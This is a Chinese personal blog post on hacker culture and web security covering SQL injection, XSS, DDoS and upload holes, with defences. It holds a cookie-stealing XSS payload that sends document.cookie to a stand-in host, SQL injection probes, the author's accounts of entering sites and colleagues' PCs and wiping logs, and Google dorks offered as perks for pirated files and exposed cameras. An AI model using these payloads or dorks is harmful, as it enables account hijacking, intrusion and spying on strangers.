鄭重聲明：該篇文章未經許可授權不得隨意轉發(fā)除博客園以外的任何地放，園內轉發(fā)必須注明原文鏈接地址。文章觀點不代表任何團體及組織，實屬個人觀點，行為！如果觸犯法律忘告知及時刪除。其它個人如果因本篇文章造成違法犯罪等不正當后果者，本人概不負責。請慎重閱讀！上幾次有人對這里的聲明表示質疑，簡單闡述一下，我國互聯(lián)網辦法中明確規(guī)定有隨意散步不良言論導致后果嚴重者必懲！文章內容比較敏感，親，慎重閱讀。就憑這一篇文章當然說明不了安全，安全是一個長期的工作，寬泛的領域，我后面想到神馬還會添加進來。推薦看看文章提到的兩本書。

前幾天聽見媒體這樣報道“美國舊金山的知名黑客巴納比·杰克(Barnaby Jack)被發(fā)現(xiàn)身亡，年僅 35 歲。”首先我們對此表示默哀三分鐘！滴滴滴滴，，，，，，，，，，當我聽聞的時候不禁大吃一驚，因為前不久我剛剛看過這家伙的杰作那就是挖掘出ATM漏洞可以自動吐錢（視頻地址：http://player.youku.com/player.php/sid/XNTg4MjIxNzg4/v.swf）同時這家伙他成功黑掉了多家廠商生產的心臟起搏器，只需十幾米之外的一臺筆記本電腦，就能讓它放出830V的電壓，足以致人死地。我立刻想到是不是這些廠商action？但是后來想想，作為黑客都是夜行動物，幾乎白天不會做事情！所以他的死也算是一個損失吧。再次默哀！

為什么要講這個？大家應該對這個新聞都知道了！其實我們就是要引出一個叫白帽黑客的名詞，這個不是一個組織，也不是一個團體，應該叫一類人，這些人大多都是網絡安全公司效力，專門挖掘系統(tǒng)漏洞，進而改善系統(tǒng)，或者聘請別人來挖掘漏洞，他們來填補。比如google,apple等，每年都會組織黑客大會，來攻破挖掘自己系統(tǒng)或者app的漏洞！進而獎勵漏洞發(fā)現(xiàn)者，作為回報。

當然上面的只是一類人，并不是所謂的黑客組織，下面我將通過自己的經歷及自己了解到的為大家講述，首先我們需要了解神馬事黑客？為神馬叫黑客？黑客精神黑客文化，或許這個詞你大多都從別的地放了解到，可是我將講述還原一個真實的事實。廢話不多下面開始。

維基百科中是這樣講的：“黑客（英文：Hacker，或稱駭客），通常是指對計算機科學、編程和設計方面具高度理解的人”，這樣的解釋不難理解，當然如果你年齡稍微大點，那或許你不用看這個你就知道，因為早期的黑客確是如此的一類，如果你看過Paul Graham寫的《黑客與畫家》那你或許會了解到真正意義上的黑客就是頂級程序員+頂級安全攻城師（https://news.ycombinator.com/這個網站就是）。為什么后面也會出現(xiàn)駭客的稱謂呢？或許今日的媒體記者在報道的時候標題應該叫“駭客”，而不是XXX黑客，在現(xiàn)在信息爆炸的時代媒體的報道手法為了吸引眼球，不斷地層出不群的抹黑黑客這一名詞。在國外早起黑客和駭客精神文化相互碰撞產生分歧的時期，我朝的這類人才也已經涌現(xiàn)出來。黑客秉承黑客的文化精神，拯救互聯(lián)網。而駭客，用于破壞個人計算機竊取個人隱私，破壞互聯(lián)網為樂。慢慢的人數(shù)積累越多，各自都成立了自己的組織，我們叫他黑客組織。而駭客沒有自己的精神文化，而慢慢的衰落，直到今日在解釋黑客一詞的時候百度百科也罷，維基百科也罷都會出現(xiàn)或稱駭客，所以這個被埋沒的地放。

如果你明白了神馬是黑客了？那你就可以跟著我的腳步，一起解密神秘的黑客文化，黑客世界，當然我也會通過自己的故事為大家講述。首先簡單介紹一下筆者知道的所謂的黑客團體（所謂就是忽略正義和非正義）下面列出曾經有一次排名。

德國AllDas.de網站發(fā)布了全球排名前25位的黑客組織和個人，共1946個黑客組織和個人參與排名，Silver Lords黑掉864家網站位于榜首，中美黑客大戰(zhàn)中臭名昭著的美方黑客組織PoisonBOx位第二，“中國紅客聯(lián)盟”(H.U.C)黑掉126家網站（統(tǒng)計不全），排名第25位，（但由）

1) Silver Lords黑掉864網站，占總數(shù)的5.92 %

2) Poizonb0x黑掉629網站，占總數(shù)的4.31 %

3) Prime Suspectz黑掉435網站，占總數(shù)的2.98 %

4) Hi-Tech Hate黑掉348網站，占總數(shù)的2.38 %

5) Unknown黑掉340網站，占總數(shù)的2.33 %

6) Demonios黑掉313網站，占總數(shù)的2.14 %

7) Hackweiser黑掉277網站，占總數(shù)的1.9 %

8) Quit Crew黑掉242網站，占總數(shù)的1.66 %

9) WFD黑掉242網站，占總數(shù)的1.66 %

10) limit.br黑掉232網站，占總數(shù)的1.59 %

11) GForce黑掉206網站，占總數(shù)的1.41 %

12) Data Cha0s黑掉166網站，占總數(shù)的1.14 %

13) BHS黑掉156網站，占總數(shù)的1.07 %

14) WOH黑掉153網站，占總數(shù)的1.05 %

15) JNB黑掉152網站，占總數(shù)的1.04 %

16) xst黑掉150網站，占總數(shù)的1.03 %

17) USDL黑掉149網站，占總數(shù)的1.02 %

18) Supreme Entity黑掉148網站，占總數(shù)的1.01 %

19) C0BR4S黑掉140網站，占總數(shù)的0.96 %

20) fux0r Inc.黑掉140網站，占總數(shù)的0.96 %

21) Evil Angelica黑掉135網站，占總數(shù)的0.92 %

22) pr0phet黑掉130網站，占總數(shù)的0.89 %

23) cr1m3 0rg4n1z4d0黑掉129網站，占總數(shù)的0.88 %

24) InfernoZ黑掉128網站，占總數(shù)的0.88 %

25) H.U.C黑掉126網站，占總數(shù)的0.8%?

注：25)H.U.C是中國紅客聯(lián)盟，國內唯一上榜組織。

上面的大多可能在后來的發(fā)展中相繼流產，下面介紹還有最近比較活躍的。

國外組織：駭客組織Anonymous（前不久攻擊過支付網站PayPal，日本街頭有組織的對抗政府）現(xiàn)在已知的全球最大的駭客組織，全球最大的政治性黑客組織。文化：宣揚人權，政府透明性組織，自由組織，政治性黑客組織。成員：遍布全世界包括中華臺北，中國深圳。

國內組織：中國紅客聯(lián)盟（簡稱H.U.C）該組織依舊存在，國內現(xiàn)在最具正義感組織，也為國內或者全世界現(xiàn)存宣揚黑客組織精神文化最好的網站（聲譽全世界），上面的排名就是其早期與全世界黑客作戰(zhàn)排名結果。文化：宣揚黑客正義的力量，為自由，為國家榮譽而戰(zhàn)的中國黑客。網站核心思想：道，可道，非常道。名，可名，非常名。成員：高中以上遍布全國（香港，澳門，臺灣等地）。有人會問，為什么對該組織很了解，個人在其混了幾年時間，包括對黑客的認識均大多來自于此。后面著重分析。

國內組織：白帽子（網站烏云）,該組織興起不久，該組織合作于我國國家信息安全中心，文化：免費嗅探各種互聯(lián)網漏洞，均以網站為核心提交漏洞.成員：大多為程序猿一族，當然核心人員應該是早起黑客一族。本人蝸居一段時間發(fā)現(xiàn)，該組織管理比較混亂，以提交漏洞而提交漏洞，各種浮躁之風。可以稱之為社區(qū)不能成為真正意義上的黑客組織，因其核心人員名譽，在我朝還算知名。某寶的一名網絡安全攻城師也在這里，曾寫過一本《白帽子講 Web 安全》還是比較不錯的。

國內組織：更早期有綠盟，也是黑客組織，因其發(fā)展不穩(wěn)定后來改變策略，后來為企業(yè)提供安全服務。還有黑白網，也是比較早的駭客組織，該組織發(fā)行各種駭客雜志及手冊tool.這些都是很早期的，現(xiàn)在境況如何不知其所在。

好了，簡單羅列以上個人知道的和有聲譽的組織，以上中只有中國紅客聯(lián)盟（H.U.C，下文都將采用H.U.C簡稱）繼承者黑客精神文化，為正義二戰(zhàn)斗的一群夜行動物，好吧姑且就叫夜行動物。也是本文通過該組織講述黑客核心文化的一個極具代表的組織（沒有打廣告哦！吼吼~~~）

在講述H.U.C之前，我想講講本人的故事，其中會穿插引出H.U.C也就是黑客文化以及個人認識看法。很多人有時候會問一個問題，就是為什么要學編程？又有很多人會說我要當黑客，不錯！這個理由貌似充滿各種神奇而又神秘的境遇。為神馬神秘？神秘的是你可以知道別人不知道的,你可以做到別人不能做到的。以前至少在互聯(lián)網上你能得知別人所不能知道的消息。我就是因為初中得知黑客一詞，高中各種肆無忌憚的跑到學校外面上網，就是為了學習黑客，搞到別人不知道的情報，能在別人面前吹噓別人不知道的東西！確實很爽(當然現(xiàn)在低調低調再低調，不玩扣扣，不玩微博，不玩微信，不玩智能手機，只玩博客園閃存。)從那以后基本高一高二每周晚上都會出去上網幾次，為此我也付出了沉重的代價，FQ手被玻璃劃破鮮血直流，直到現(xiàn)在手指上的疤還在，這樣的付出讓我很早的就是知道了黑客的意義，黑客的行為，大多晚上活動與互聯(lián)網的某個角落，學校微機課的時候可以遠程關閉掉別人的計算機，當時感覺很爽，可以通過DOS命令發(fā)送消息給指定的ip地址，可以動過DOS潛入別人的電腦（當然這些或多或少的大家都玩過，不過僅限xp以前的系統(tǒng)）慢慢的這一切覺得很有意思，每當報紙新聞等爆出XX黑客攻擊，等字樣，我就要立刻的閱讀獲取第一手信息（當然這個習慣現(xiàn)在還保留著）

后來接觸到一個電子書，大概就是某個黑客寫的一個自己的自傳，通過這個我了解了很多名詞，神馬后門，神馬蜜糖，神馬跳板，神馬弱口令，神馬sql注入，神馬肉雞，等等讓我知道黑客的路很遠。不知道哪里看到了一個評論就是說用工具攻擊別人的人永遠都是工具小子。

后來決定必須了解攻擊原理才能理解那些專業(yè)術語！所以大家懂了，走上了編程之路。當然那個時候也是比較熱愛代碼的。慢慢的經過學習，工作，一段時間的積累和在H.U.C有段時間的理解，有了編程功底，理解那些名詞很容易懂而且可以知道工具原理是神馬了。

其中在這段時間里，個人也友情檢測過很多網站，不過大多都是存在sql注入及跨站腳本，很多時候企業(yè)都是不注重服務器安全的，至少在我朝是這樣，早前這種情況簡直不敢直視，漏洞蔓延很厲害，現(xiàn)在好多了！一般通過掃描后臺登陸page,注入獲取username+password登陸系統(tǒng)修改網站內容， 上傳大馬（檢測網站一般上傳頁面的腳本木馬，通過這樣的方式提取更高權限，從而獲取webshell遠程控制服務器，有人還會留后門方便下次進入，所謂后門就是開啟遠程控制服務端口，或者將上傳的馬隱藏的更深以便下次進入。高級黑客還有一個習慣就是每次進入你的電腦就像進入你家一樣，先敲門，走的時候記得給自己留后門，還不忘打掃一番，這樣不會留下自己的腳印,啥？你不知道？就是刪除系統(tǒng)日志。當然還有一部分比較粗暴型的就是直接代理ip）這個時候服務器就是你的了，不高興了想remove神馬就remove神馬，當然我一般進去都是看看，觀摩一番，不會做更大的動作。駭客攻擊服務器的最終目的也是想拿到服務器最高權限。后來也在內網潛入別人的計算機，看看基本不會亂動別人的東西！當然這些基本都是XP系統(tǒng)。自微軟windows7以上版本發(fā)布，很少有人去探索研發(fā)此類軟件，而且本身微軟的發(fā)行速度也是比較快的。導致很少有此平臺以上的漏洞（當然這里僅談攻擊個人電腦，比如早前知名的熊貓燒香，灰鴿子都是針對個人及網吧用戶）。

當然最近一次，就是內網嗅探過公司用戶的個人pc，沒做任何事情，發(fā)現(xiàn)有四分之一的用戶還是xp，而且沒設密碼、在剛來博客園的時候發(fā)現(xiàn)閃存存在XSS漏洞，及時通知dudu，園長大人很快修復。然后就是前幾天知名的struts2之Xwork 的ONGL漏洞，我也寫了實戰(zhàn)演示博文。抓到一大把的struts網站漏洞，有一個網站漏洞百出，直接給停止了！反省反省再上線。

至此個人的故事講述完畢，當然很多人覺得講這個是在賣弄，或者跟本文無關，恰巧錯了！我不能說自己是黑客，也不能說自己秉承黑客的精神文化，個人覺得黑客文化精神就是這樣的，崇尚自由，崇尚不破壞互聯(lián)網，不破壞個人信息安全，為正義而戰(zhàn)，為光榮而戰(zhàn)，只為追求世間真理而存在或者說互聯(lián)網沒有絕對安全的鑰匙。就像中國有句古話說的好：“沒有不透風的墻”。當然有人會覺得我是有點神話了！你錯了！

現(xiàn)在我們來講講H.U.C，誕生的很早，在互聯(lián)網的浪潮中也沒有淹沒，反而而且改版，深受廣大愛好黑客精神文化的人員喜愛，為什么它能如此健康的發(fā)展？我總結了一下幾點：

1.有嚴格的將懲罰制度，網站人員作風低調，行動高調。

2.定期組織以打擊互聯(lián)網不正之風為活動的掃描拿站活動（打擊黃、賭、毒、槍支販賣，貌似網站8月份又有一次活動）

3,核心成員擁有秉承黑客精神文化。

4.不以利益為目的的存在。

網站發(fā)展早期曾經多次與全球駭客抗衡（美國，日本，東南亞各國），這場沒有硝煙的戰(zhàn)爭打到現(xiàn)在，而網站的服務器也多次受到國外駭客攻擊，一度癱瘓，關閉！曾經核心成員也都相繼各奔東西，但后來通過網站召回不少一直到現(xiàn)在，有句話叫一個男人的成熟就看他經歷了多少風雨。我們每次聽到國家領土受到威脅的時候都是這些人第一時間發(fā)起網絡攻擊，這一點很符合紅盟主旨但不是黑客文化。強調一點，這里不存在政治色彩。現(xiàn)在紅盟的發(fā)展本著發(fā)展祖國網絡事業(yè)，培養(yǎng)網絡英才，增加國人網絡安全意識的宗旨。這里不做過多介紹了，也不是本文重點。

如果你讀到這里了，你對黑客有所了解了，那我我們開始本文重點所要講述的內容。著重講述web方面的安全，至于客戶端的安全現(xiàn)在基本很少有人可以的去攻擊個人pc,不過會講講一些基本的安全常識、服務器級別的安全也不是本文重點，服務器可能涉及的范圍更廣，需要更專業(yè)的安全攻城師、

第一章節(jié)：pc端安全

pc端安全，基本涉及到的是個人的pc安全，包括大多數(shù)常見的木馬都是基于windows xp級別的，就像上文提到的一樣，現(xiàn)在windows7及以上的版本很少有,你可能大概會問，為什么這樣講？首先不管黑客駭客，攻擊的個人pc的目的就是獲取個人資源信息或者出于愛好，而大多數(shù)用戶都是基于windows下，而windows生命周期最長的一個版本就是xp，而xp的安全性又不是很高，即使填補，也是道高一尺魔高一丈。生命周期長了，讓駭客有精力也有時間去研發(fā)各類攻擊軟件。早起我們聽說過的熊貓，灰鴿子，都是很強大的遠控軟件，更高級的功能還具有遠程內網穿透功能（神馬？你不知道內網穿透？意思就是攻擊者通過外網的ip掃描到遠程內網段的ip，進而對內網的用戶發(fā)起攻擊）受害最多的或許就是網吧的電腦，很多駭客早起用這玩意，抓取大量肉雞供自己消遣娛樂！如果你玩游戲（賬號被盜后基本都是刷裝備，然后到網絡黑市交易牟利，當然這類人大多數(shù)不懂駭客，而是花錢買工具自學，當然也有一部分人專門做這個！比如曾經我見過一個勁舞團的外掛買到100-200那個時候已經夠高了！早期的數(shù)據(jù)不加密，基本大多都是采用C++編寫修改內存欺騙服務器）、扣扣（曾經有一個論壇專門研究扣扣的協(xié)議，這下你明白早期你的號碼被盜了吧！）等等發(fā)現(xiàn)號被盜了,很可能你的機器被人抓雞了，灰鴿子有自動上線提醒，只要肉雞上線就能實時監(jiān)控！可怕吧！

其實這類遠控都是有客戶端，服務器端，前者就是發(fā)送給受害者，后者就是駭客控制端。為什么還能中招？就是因為很多人對系統(tǒng)安全設置不夠，當時殺毒基本都是通過文件名來查殺，很多加殼過的，加花代碼基本都會繞過殺毒。

安全意識差的用戶就會接受黑客發(fā)過來的客戶端，當然黑客不會傻到直接發(fā)exe，當然是一個偽裝過的文件，比如：圖片文件打開的時候就會遠程下載木馬客戶端到本地，都是影藏掉的。還有就是大多數(shù)用戶guest用戶開啟、遠程端口開啟、弱口令（admin/admin,之類的很容易被人猜解的）通過合法遠程登錄。然后創(chuàng)建駭客的賬號密碼以便下次進入，最后遠程開啟telnet，登錄，這個時候你的機器就是人家的了！想干嘛干嘛，即使有殺毒軟件，立刻運行net stop 服務器名 ，殺毒軟件就死翹翹了！當然你可能猜你的密碼較安全？錯，駭客有黑客字典，暴力破解。類似于你家門鎖了，他會拿很多的鑰匙去開門，不巧，成千上萬把的鑰匙總會有一把會破解。當然還有更可惡點的就是軟件捆綁，有些人寫的軟件里面會捆綁木馬安裝！還有更厲害的就是研究網絡協(xié)議，攻擊你們家的路由器，攔截數(shù)據(jù)包，要知道那個時候數(shù)據(jù)加密很少，大多數(shù)消息都是赤裸的傳遞，駭客很輕易地就能解析數(shù)據(jù)包（當然現(xiàn)在還有人在做這些，只不過難度很大了，現(xiàn)在的數(shù)據(jù)都是加密過的！但是也不是不能破解的!）

當互聯(lián)網各種木馬蔓延的時候，殺毒軟件乘風波浪的來了，對！就是這個時期，各家殺毒軟件為了爭寵，相繼使出各種的風騷弄姿，確實杜絕了一些木馬的運行！但是記得他們的殺毒都是表面的還是不能完全值得用戶認可！最后一個時期就是殺毒軟件明爭暗斗的時期，當然這個事情他們確實下功夫了，建立自己的病毒庫，采取掃描內容殺毒，脫殼掃描，直到windows7現(xiàn)在市面上常見的病毒幾乎無法正常運行！

駭客到了這個時期幾乎淘汰了一大批了，你可能會問為什么？因為這就是一次革新，僅僅會用tool的駭客就沒用武之地了，因為幾乎沒人寫這種針對pc端木馬！技術高手都相繼轉移服務器端，因為這個事情也是我朝互聯(lián)網發(fā)展的一大時期，人們漸漸地對互聯(lián)網有更多的認識，大多的數(shù)據(jù)都保存在服務器。這個就是接下來我們的重點服務器端安全。

?

第二章節(jié)：服務器安全

服務器顧名思義，就是提供用戶服務使用，一般為企業(yè)級眾多受眾范圍廣，所以服務器的安全是不可忽略的事情。再講之前我們先講兩個發(fā)生在離我們最近的故事，不久之前號稱國內知名某某開發(fā)者論壇數(shù)據(jù)庫被爆菊花，駭客地下售賣這些幾百萬的用戶信息。最后浮出水面，各大網絡下載鏈接出現(xiàn)。隨后就爆出好幾個門戶（包括網易郵箱）及游戲網站都是如此密碼明文保存。各大媒體雪上加霜似的各種頭版頭條報道，不可否認的是，那個時期我朝的互聯(lián)網確實還是正發(fā)展時期！沒有建立更好的安全意識，出現(xiàn)問題依然高姿態(tài)的故作鎮(zhèn)定！當然現(xiàn)在都改掉了這些壞習慣，基本很小的網站他都知道用MD5加密或者其他加密算法(現(xiàn)在MD5加密也能被破解了，最好的辦法就是加點鹽，意思就是采用用戶名+密碼的方式加密，老外用彩虹表跑MD5很輕松的。有些國外駭客還用這個賺錢，跑一個MD5多少刀)。很好，從這個故事中我們可以得出一個結論：戳到他痛處的時候他就知道錯了！他就會改的!但是我們僅做好這些就好了嘛？顯然不夠，我們切不談服務器本身的安全問題，這里著重講講流行的webapp攻擊手法，可能或多或少你也了解。然后說說從哪些方面杜絕這些低級錯誤。加強我們的安全。買了那么多廢話，我們該講講實用的了，因文章篇幅更多的介紹原理，及防范措施！基本不會演示。

提綱：1、SQL注入攻擊。

2、XSS跨站腳本攻擊。

3、DDOS攻擊。

4、文件上傳漏洞。

?

下面我們通過講解和例子，來闡述其原理及如何來防范這些現(xiàn)在已經流行的攻擊手法。

SQL注入攻擊：

這個漏洞想必很多人都知道，而且現(xiàn)在流行的各種開發(fā)框架幾乎都可以杜絕這種低級錯誤，當時有些時候可能有些coder自己寫的一些sql就可能會忽視。駭客手里的sql注入工具都是成批量的檢索漏洞，而且內置了基本常用額字典。這里不做太多講講，網上信息一大把，講講核心的和注意的地放。

攻擊手法：在連接的后綴(比如：http://www.abc.com/news.action?id=1 )加 and 1=1 ,沒報錯正常訪問， ok！然后換and 1=2 如果出現(xiàn)數(shù)據(jù)庫錯誤，ok這個網站存在注入。要是登陸界面存在1=1那你就可以繞過他的驗證！直撲首頁了！ 如果沒有接下來的工作就是 and exists(select * from 表名)各種的揣測，如果不湊巧你的表名被猜中那你數(shù)據(jù)就被獲取了。獲取到用戶登錄表，駭客就可以根據(jù)用戶名密碼登錄！但是有一點人一般我們的后臺登陸是影藏過的駭客不好找，駭客得到用戶密碼不知道在哪里登陸？呵呵，這個可是駭客萬水千山的第二個難題，不過他們手里一般都有很成熟的批量掃描后臺登陸頁面的工具，準確率達70%左右，你會說不可能？錯了！這些里面也是內置字典，也可以自定義，經過漫長歲月的積累這些字典的命中率極高（到這里想有點題外話，前不久有媒體曝某招聘節(jié)目51job被黑客攻擊，當然看過節(jié)目的都知道，不過我想講的是那童靴簡直就是侮辱我朝黑客的智商，最起碼我朝黑客也是在國際上出來名的，他竟然宣稱自己找到51job的后臺登陸頁面，然后大肆的宣揚自己攻擊了51job，以至于媒體的標題買點就是51job被黑客攻擊，我當時立刻打開節(jié)目，結果我聽到的是他找到51job的登陸界面！我擦，我當時暈倒啊，真想給這小子一巴掌。有人會說那小子無辜滴，媒體宣揚！不過我看那小子口口聲聲撕咬不放自己是黑客。好了，拿你沒辦法！）下面看圖，我建了一個測試數(shù)據(jù)庫及表，通過mysql——sql語句演示上面的執(zhí)行結果會發(fā)生神馬變化！

《圖1.1》

圖1.1中第一條sql就是我們一般驗證用戶sql沒什么特別，但是看第二條通過第二天我們得到了該表的數(shù)據(jù)總數(shù)。那么我們如何獲得表內容呢？很簡單！看下圖

《圖1.2》

圖1.2中我們可以看出數(shù)據(jù)全部被顯示出來。or的意思大家都知道，滿足其一就可以！假使我們輸入的用戶密碼完全不存在那也可以查出所有的內容！其實說白了，1=1就是這條sql永遠都是true可執(zhí)行的。

防范措施：當然過濾非法字符（前后臺都要過濾，有些前端過濾就是擺設！駭客有瀏覽器插件立刻繞過你的前端驗證！直接無視!），這個指標不治本，上面的那些都是后臺拼裝sql惹的禍。所以我們最好還是不要拼裝sql，現(xiàn)在框架都基本是ORM映射！還可以通過預編譯sql來完成(比如：存儲過程)

?

XSS跨站腳本攻擊：

這個有些人也玩過，不過這里能我們這次連同cookie盜取一塊來演示，也算是這幾個里面最有搞頭的一個。很多駭客或者取樂的玩家都是發(fā)個鏈接給別人然后異地盜取別人的cookie登陸該用戶。當然這個代價有點高，一般需要一個網站來支持你盜取的cookie遷移。所以這里我測試的時候建立發(fā)布了兩個項目來實現(xiàn)cookie移花接木之術！首先建立了兩個項目一個是Test，一個是Demo，Test是一個存在XSS漏洞的網站！Demo是我用來遷移我發(fā)給某人一個連接，某人點擊后盜取該用戶的cookie（當然這個cookie就是該用戶登錄過該網站）然后我通過盜取的cookie，實現(xiàn)不用輸入密碼賬號自動就能登錄被我盜取賬號！好了廢話不多，開始演習！

準備工作，開始之前為了保證數(shù)據(jù)的準確性，我都刪除了連個瀏覽器的cookie.如下圖：

《圖2.1》《圖2.2》

接下來要做的就是發(fā)布項目，發(fā)送XSS跨站連接給我的目標用戶，當然這里的目標用戶就是我了撒！哈哈！看圖講故事！

先假設某人登陸這個系統(tǒng)如下圖：

《圖2.3》《圖2.4》

圖2.3admin上方的輸入框就是存在XSS漏洞的、接下來就是我們生成好自己的跨站腳本發(fā)出去即可，只要有人點擊就ok中招！發(fā)到論壇帖子都可以！

http://localhost:8080/Test/Test?username=%3Cscript%3Elocation.href%3D%22http%3A%2F%2Flocalhost%3A8080%2FDemo%2FXSS%3Fid%3D%22%2Bdocument.cookie%3C%2Fscript%3E(等號后面翻譯過來就是<script>location.href="XXXX.com?id="+document.cookie</script>手法很多這只是其中之一)

上面的連接就是我的測試加花過的連接，否則別人一眼識破，所以很難中招，我們就需要編碼加花！這樣欺騙成功撒！

接下來就是觀察我的Demo應用也就是遷移cookie用的，看看是不是有人點擊了，打印出來了他的cookie.

《圖2.5》

上圖中當然就是我通過火狐訪問上面的連接，然后在Demo應用的控制臺打印到的Test應用當前登陸用戶的cookie了。接下來就是我們拿到這個cookie干嘛呢？不要著急！我們先用另外的火狐瀏覽器訪問以下Test確保沒有登錄！

《圖2.5》《圖2.6》

圖2.5.ok木有登陸！然后你是不是看見我的瀏覽器工具欄有個叫cookies的，不錯我們現(xiàn)在就是要用他來填充我們剛剛控制臺獲取到的Test應用cookie實現(xiàn)登陸！填充如上圖圖2.6.

《圖2.7》《圖2.8》

如圖2.7所示我填入的就是剛剛Demo控制臺打印出來的cookie就是剛剛admin登陸進去的cookie.結果很顯然就是上圖2.8所示，admin移花接木成功登陸。到這里我們的完整演示完畢！

總結：上面的演示就是XSS真正跨站背后，駭客想要得到神馬樣的結果，結果就是遠程獲取用戶cookie，實現(xiàn)駭客登陸系統(tǒng)任意執(zhí)行該用戶賬號行為（比如：發(fā)布消息，修改資料，刪除內容等等），當然現(xiàn)在基本瀏覽器都能攔截跨站攻擊，只要你的瀏覽器沒有取消此類設置，我在寫演示的時候幾乎主流都可以攔截只有火狐完全無視，chrome直接殺死連提示都木有。

防范措施：當然面對上面的問題我們也有解決方案，就是采用httpOnly來阻止javascript來獲取或者說訪問cookie，以達到保護cookie的目的！這個還不夠因為跨站的漏洞還在那里，所以我們需要做的還要消除跨站，過濾非法字符比如：<script></script>這樣的標簽，還是那句老話，前后臺都要過濾，如果你覺得麻煩，后臺必須過濾！當然大多數(shù)框架也已經有這層過濾了。博客園的閃存也出現(xiàn)過XSS,不過我及時通知dudu修復！而且博客園cookie也是加了httponly的。

對于httponly各個語言都有自己的不同方式這里不貼代碼了，自己call大神google吧！好吧，真心寫到這里累了！不過繼續(xù)寫完！go on

還是貼一些吧：

java：

一種：response.setHeader("Set-Cookie", "cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");

一種：

也可以在 web.xml 配置如下：

<session-config>

<cookie-config>

? <http-only>true</http-only>

</cookie-config>

<session-config>

C#:

HttpCookie myCookie = new HttpCookie("myCookie");

myCookie.HttpOnly = true;

Response.AppendCookie(myCookie);

注意各版本不同，也會有區(qū)別。

DDOS攻擊

DDOS攻擊業(yè)界洪水攻擊，來勢洶洶，瞬間毀滅，歷史上國外駭客控制肉雞曾今導致電商網站十幾分鐘無法訪問，損失不言而喻！直到現(xiàn)在DDOS還是很難徹底解決，我們只能通過預防的手段來防止發(fā)生！這里也不好做演練簡單講講！

其實原理就是同一時刻發(fā)起大量的http請求，導致服務器阻塞無法及時響應而癱瘓，嚴重點服務器崩潰！這個類似于網站的吞吐量，前不久博客園的毛病就似乎是這樣一口氣下去差點上不來！現(xiàn)象是這樣，但也不能冒昧的斷定就是DDOS，阿里云號稱自己能抗這種攻擊！不過一般的DDOS量不大還可以！駭客手里都有這種小工具只要輸入網址鼠標輕輕一點，選擇洪水大小，網站立刻就走上坡路了。

防范措施：這種情況最好首先優(yōu)化自己的系統(tǒng)整體性能包括數(shù)據(jù)庫性能，性能上去了，吞吐量上去了，然后再考慮配置高點的服務器，這樣性能才能調到最佳！還有就是盡可能的采用靜態(tài)頁面！也就是大家常說的網站靜態(tài)化這樣對于抵擋DDOS有很大幫助！最后想說的一點就是凡是用DDOS攻擊的都是閑的蛋碎的人弄的事情，記住是閑的蛋碎的人！哈哈！不是蛋疼的人哦！除去友情壓力測試的！一般情況下很少有人干這個事情，除非你得罪XXX,駭客一般情況拿它來宣泄政府！

文件上傳漏洞：

顧名思義就是文件上傳存在漏洞，怎么講呢？有些時候我們的上傳文件驗證考慮不全面就會導致被惡意上傳文件。這種上傳的文件常見的就是前面我們提到的木馬文件（有php,jsp,asp,等等）kindeditor我朝的一款富文本編輯器，在上一個版本就發(fā)生上傳文件漏洞被駭客利用！一度也在互聯(lián)網引發(fā)軒然大波！其實就是上傳文件部分驗證不夠規(guī)范，導致可以上傳木馬文件。

駭客手里有針對各種不同語言而開發(fā)的木馬文件，俗稱大馬，小馬，大馬上傳過去就可以獲得服務器遠程管理權限，通過訪問自己上傳到你應用的大馬實現(xiàn)遠程操作服務器。進而穿透C段網絡，掃描同段服務器，比如你的應用架在VPS商那里，那么一臺服務器可能會涉及很多其他網站，這樣就可以通過一個網站滲透更多的網站！然而駭客要想走到這一步現(xiàn)在他需要登陸你的網站后臺管理頁面，然后找到存在此種漏洞的網頁上傳！所以顯然如果你存在前面的漏洞那你就是為駭客到這一步做鋪墊的！顯然這是一個連鎖反應。

防范，這種就是檢查你的上傳文件部分，驗證要全面，還有就是日志記錄，這樣以后即使發(fā)現(xiàn)問題，你就可以通過日志追蹤溯源很容易修改，有些駭客為了讓你很難找到上傳的文件，就會偽裝，所以對你來說維護起來很大麻煩！不定時的檢查目錄結構！該有的權限設置必須加！

重點內容講完了，我們再接著講點其他的一些知識，就是上次有人提到有些網站不能在一段時間內多次評論，這個也算是一種安全策略，包括博客園也有這種策略（博客評論短時間內不能多次評論，閃存不能連續(xù)發(fā)送5條以上的數(shù)據(jù)否則不顯示）其實這些是早起流行起來的是《論壇灌水機》，原理就是有些人會寫一些機器人工具自動刷帖，自動評論的！導致大量的無效數(shù)據(jù)存在，導致頁面顯示全是灌水機的。所以在寫對外網站論壇類必須重視這個。

接下來我們再講講google怎么用，對，就是google怎么用，當然有些人說這有神馬會用不會用的，不就是搜索嘛！錯了，有種檢索的手法正是駭客常用手法，當然一些人應該也知道，知道的就不用看了！駭客常用這種手法來獲取攻擊目標。即輸入：inurl:news.action?id= 亦或者website:baidu.com 簡單講解，前面的那個就是檢索google搜索結果url里面以inurl：后面為結尾的網站。后面的檢索域名中包含baidu.com的網站。不要小瞧這兩個小玩意，很多駭客在用這種手法滿河撈魚。當然news你隨意發(fā)揮，就比如黑客字典一樣，想到的越多或者越切近檢索目標就能能找出你想要的。下面我再透漏一點。

在搜索框上輸入：“indexof/”inurl:lib

再按搜索你將進入許多圖書館，并且一定能下載自己喜歡的書籍。

在搜索框上輸入：“indexof/”cnki

再按搜索你就可以找到許多圖書館的CNKI、VIP、超星等入口！

在搜索框上輸入：“indexof/”ppt

再按搜索你就可以突破網站入口下載powerpint作品！

在搜索框上輸入：“indexof/”mp3

再按搜索你就可以突破網站入口下載mp3、rm等影視作品！

在搜索框上輸入：“indexof/”swf

再按搜索你就可以突破網站入口下載flash作品！

在搜索框上輸入：“indexof/”要下載的軟件名

再按搜索你就可以突破網站入口下載軟件！

注意引號應是英文的！

再透露一下，如果你輸入：

“indexof/”AVI

在google里輸入

inurl:"viewerframe?mode="

隨便打開一個,然后按提示裝一個插件,就可以看到了!!!

以上都是福利哦！呵呵呵額。。。。。

全文總結：

